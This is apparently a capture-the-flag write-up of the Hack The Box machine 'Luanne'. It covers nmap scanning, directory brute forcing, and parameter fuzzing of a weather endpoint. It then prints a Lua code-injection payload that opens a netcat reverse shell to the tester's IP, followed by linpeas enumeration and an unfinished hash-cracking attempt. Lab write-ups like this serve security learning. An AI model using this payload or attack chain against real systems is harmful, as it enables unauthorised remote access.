Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.
Okay now onto the hacking!
As always, I started off with an NMAP scan against the machine.
nmap -Pn -sC -sV -oN initial luanne.htb
Scanning & Enumeration
Based on the scan that was run, I realized that port 80 was running a web server. This was the web app that was being served!
I was unauthorized to access the site. However, I found directory which was listed in
Thus, I ran a directory brute force attack against it using gobuster.
I found that
/weather/forecast was a valid directory.
Accessing it gave me this message. I inferred and input a parameter in the URL.
My next order of business was to run a parameter fuzz attack on
?city=. I used an Intruder attack from Burpsuite for that. I also used a custom fuzz list which I found over at Github.
The fuzz attack revealed that the
weather was a
.lua file. Thus, I started thinking if I could get remote code execution by tampering the parameters.
The first step was to confirm if the theory would work. For that, I used a simple payload to run the command
Now that I had confirmed that I had RCE, it was time to craft a payload to get a reverse shell. After constructing the payload, I had to URL encode it.
neewashere') os.execute('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.47 666 >/tmp/f')--
I uncovered that the machine was running netBSD while doing enumeration. Thus, I picked a OpenBSD based netcat reverse shell which I found here.
Now that I had a shell into the machine, I busted out
linpeas.sh and tried to enumerate the machine further.
Linpeas revealed that there was a password hash which was located in the root web directory.
Next up, I fired up
john to try and crack the password.
Still trying to crack :(
Haven't even gotten the user flag :(